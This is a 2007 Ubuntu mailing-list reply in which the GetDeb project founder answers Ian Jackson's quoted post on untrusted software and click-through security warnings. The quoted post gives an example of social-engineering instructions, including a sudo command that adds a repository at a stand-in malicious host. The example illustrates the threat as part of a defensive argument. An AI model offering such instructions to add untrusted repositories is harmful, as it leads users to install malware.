Hello,<br>I am the project founder and project manager of a software portal created to provide the latest software for the current released Ubuntu version.<br><a href="http://www.getdeb.net" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.getdeb.net
</a><br><br>First let me introduce our project:<br><br>Team:<br>We about 6 volunteer active members, some are also Ubuntu/Debian package contributors, some others are just open source and Ubuntu supporters like myself.<br>

<br>Software distribution:<br>The software is being published using links to .deb files (thanks to gdebi).<br>Every day we are providing &gt;5000 downloads, 100 GBs distributed over 10 mirrors.<br>We have about 6000 registered users, our current work queue is 40 packages (new software plus updates).
<br><br>Failures:<br>We have provided about 4 failed packages in 400 releases, 2 of them have overwritten the user&#39;s mime database, the other&#39;s where failed package installs. The failed installations could be rolled back with &quot;Remove program&quot; &quot;Add Program&quot;
<br><br>Internationalization:<br>The site template is translated into 27 languages (some with missing strings), we have 887 applications descriptions translations.<br><br>Users feedback:<br>You can check the comments for yourself, besides that you can also check what people say about us on their blogs.
<br><br>Security:<br>We do not distributed third party provided .deb packages, all of our packages are built on an automated building server, validated and uploaded after our base QC. Our current risk resides on the distributed nature of our mirrors, there is an higher potential risk of system compromising, we have minimal integrity validation, but not sufficient from a security point of view. This our current main concern and driving factor for an APT mirror adoption, however there are some limitations and/or lack of know-how to setup an APT mirror and select a proper system and client configuration that can keep our current high availability and user-oriented software distribution model.
<br><br>I agree with some of&nbsp; your points, but not with others, anyway your note was a notification, not a request for comments. <br>I do not know if you decision will actually block malicious users, malicious users take more advantage of those users which are not security aware, or which are just desperate to get some software, 
<br><br>Your decision will have a major impact on our team objectives and work plan on the short term, which may be a significant impact to the Ubuntu/Getdeb users community on the long term. 
<br><br>Is there a plan with dates for this changes to be implemented ?<br><br>Thank you<br><br>Message: 1<br>Date: Fri, 28 Sep 2007 15:56:31 +0100<br>From: Ian Jackson &lt;<a href="mailto:iwj@ubuntu.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">


iwj@ubuntu.com</a>&gt;<br>Subject: Untrusted software and security click-through warnings<br>To: <a href="mailto:ubuntu-devel@lists.ubuntu.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">ubuntu-devel@lists.ubuntu.com
</a><br>Message-ID:<br> &nbsp; &nbsp; &nbsp; &nbsp;&lt;<a href="mailto:18173.5663.835956.688760@davenant.relativity.greenend.org.uk" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">18173.5663.835956.688760@davenant.relativity.greenend.org.uk
</a>&gt;<br>Content-Type: text/plain; charset=us-ascii<br><br>We had an IRC discussion during the Desktop Team Meeting on<br>#ubuntu-devel about apt+http://foo.bar?package=baz (which might add<br>new repositories such as PPAs). &nbsp;This turned into a long discussion of
<br>the merits of various security considerations and convenience<br>tradeoffs. &nbsp;I said I&#39;d post here about it. &nbsp;What follows is very much<br>my personal view but I think the conclusions are inevitable.<br><br><br>Firstly, I would assert that we are largely responsible for the
<br>security of Ubuntu users&#39; systems:<br><br>We cannot assume that our users are sufficiently knowledgeable and<br>experienced to know what is and is not an acceptable risk to take. &nbsp;We<br>must ensure that naive users following the obvious path to get their
<br>work done are not led into error.<br><br><br>Secondly, click-through &quot;get this task done&quot; security warnings are<br>harmful:<br><br>It is well established through research (and I&#39;m sure through the<br>personal experience of most of us here) that systems which pop up
<br>dialogues which essentially ask the user &quot;so do you actually want to<br>do what you just asked me to&quot; are useless. &nbsp;The user will almost<br>inevitably just say &quot;yes&quot; without reading any of the text.
<br><br>It has been argued in the past that these dialogues are useful to<br>some power users, who know what they really mean. &nbsp;Perhaps this is<br>so. &nbsp;However, the point of Ubuntu is to make computing accessible to<br>everyone - not just experts. &nbsp;And a computer which leads a user astray
<br>is not accessible to that user.<br><br>Therefore these dialogues should be abolished. &nbsp;In cases where the<br>dialogue is there to ask the user to permit a dangerous operation, the<br>system should be reworked so that either
<br>&nbsp;1. the operation is made less dangerous (so that it can be safely<br> &nbsp; &nbsp;done without prompting), or so that<br>&nbsp;2. the operation can only be requested by much more explicit action<br> &nbsp; &nbsp;by the user (not by some third party!) so that no further
<br> &nbsp; &nbsp;confirmation is needed.<br><br><br>Thirdly, the Internet is full of malicious people who would like to<br>install software on our users&#39; computers.<br><br>This is less true now than it will be in (say) 5 years&#39; time. &nbsp;The
<br>main thing which is holding back the deployment of malware against our<br>users is that we are not currently as juicy a target as M$&#39;s systems.<br>When Ubuntu is as popular as Windows, our users will have many of the
<br>same problems that Windows users do now.<br><br>The reason for this is that we have been inheriting (sometimes via<br>third parties) the idea that it is acceptable to go to a website, find<br>you need to install some software to use it, and then install that
<br>software provided by that website - and the idea that it is a sensible<br>thing for a user to look for zero-cost software via a search engine<br>and then just install it.<br><br>All of us experts here know that this isn&#39;t a good way to proceed.
<br>But our users don&#39;t. &nbsp;For these reasons, it is up to us to do better.<br><br><br>Conclusion: Ubuntu systems should not provide a smooth `click through&#39;<br>route to the installation of untrustworthy software.<br>


<br>Untrustworthy software includes all software which we don&#39;t have some<br>reason to trust. &nbsp;This means:<br><br>&nbsp;* No click-through installation of downloaded .debs<br>&nbsp;* No click-through addition of arbitrary apt repositories or keys
<br>&nbsp;* No click-through installation of arbitrary browser plugins<br>&nbsp;* No click-through addition of PPAs without further policy controls<br><br>What _is_ OK is:<br><br>&nbsp;* Yes, click-through installation of .debs already in Ubuntu
<br>&nbsp;* Yes, click-through installation of browser plugins provided in Ubuntu<br>&nbsp;* Yes, click-through installation of media codecs provided in Ubuntu<br>&nbsp;* Yes, click-through addition of PPAs whose uploaders we bless<br>

 &nbsp; &nbsp;and for which someone will provide security support
<br><br>There should be some kind of click-through here because installing<br>software is a significant step: it consumes time and bandwidth and may<br>make the system less stable. &nbsp;We need to keep the user informed so<br>


they know what they&#39;re waiting for and give them the opportunity not<br>to have their work interrupted by the download and installation<br>process. &nbsp;Note that the click through serves the user&#39;s convenience,<br>not their security.
<br><br><br>What might also be OK is selectively permitting the installation of<br>software from third parties that we have the right kind of<br>relationship with. &nbsp;We would have to think about what the criteria<br>might be, but here is a starting point:
<br><br>&nbsp;* The third party would have to agree in a legally binding way to<br> &nbsp; uphold and not subvert the user&#39;s rights on their own computer;<br>&nbsp;* The third party would have to commit to provide security updates,
<br>
 &nbsp; where necessary, within a defined timeframe.<br>&nbsp;* The list of approved third parties should be provided by Ubuntu and<br> &nbsp; programmatically enforced by the software;<br>&nbsp;* We should be able (both contractually and technically) to
<br> &nbsp; withdraw/revoke such a third party permission if they turn out<br> &nbsp; in our opinion not to take our users security and privacy<br> &nbsp; seriously;<br>&nbsp;* We should think carefully about the user interface for enabling a
<br> &nbsp; particular third party, which ought to be an explicit step;<br>&nbsp;* We should consider the position of users who have already approved<br> &nbsp; a particular third pary source which we have revoked -<br> &nbsp; specifically, we should consider what actions of ours would be in
<br> &nbsp; the best interests of those users.<br><br><br>What is of course also necessary is an ability for power users to<br>specify additional third-parties without any blessing from Ubuntu.<br>However *this facility must not to be accessible to naive users*.
<br><br>In particular, it *must not be possible* for a third party to invoke<br>such a UI via eg a website, incoming email, video file, or whatever.<br><br><br>We can&#39;t stop third parties writing on their website<br>

<br>
 &nbsp;&quot;Now go to &nbsp; Settings / Advanced / Trusted Software Sources<br> &nbsp; and select &nbsp; Add Absolute URL<br> &nbsp; and paste in &nbsp; <a href="http://malware.example.com/ubuntu/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">


http://malware.example.com/ubuntu/</a><br> &nbsp; say `confirm&#39; to the security warning and enter your pasword&quot;<br><br>or<br><br> &nbsp;&quot;Select &nbsp;Applications / Accessories / Terminal<br> &nbsp; In the window type<br> &nbsp; &nbsp; sudo apt-add-untrusted-repository --force-security-override 
<a href="http://malware.example.com/ubuntu/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://malware.example.com/ubuntu/</a><br> &nbsp; and type in your password when prompted.&quot;<br><br>but even a naive user can be expected to smell a rat there.
<br><br>On the other hand if the third party can say<br><br> &nbsp;&quot;Your browser does not support Frobnication.<br> &nbsp; [Click here] to install it&quot;<br><br>the user will click and probably say yes to the confirmation question
<br>and enter their password when prompted. &nbsp;So we have to prevent that.<br><br><br>I realise that this may involve changes to some of our existing<br>software, which doesn&#39;t always adhere to the principles above, and it
<br>will cause some pain. &nbsp;I&#39;m sure it will cause howls from those power<br>users who are wedded to their favourite firefox extensions and feel<br>that all users should have an easy route to installing them.<br><br>But the alternative is that in 5 years&#39; time our users&#39; systems will
<br>be malware-infested nightmares.<br><br>Or to put it another way: the point of Ubuntu is to give users control<br>over their own computers - that is, Freedom. &nbsp;Our job includes<br>defending that control against those who would risk it in the name of
<br>temporary convenience.<br><br><br>Thanks for your attention.<br><br>Ian.<br clear="all"><br>-- <br>Joćo Pinto<br>GetDeb Package Builder<br><a href="http://www.getdeb.net" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://www.getdeb.net</a>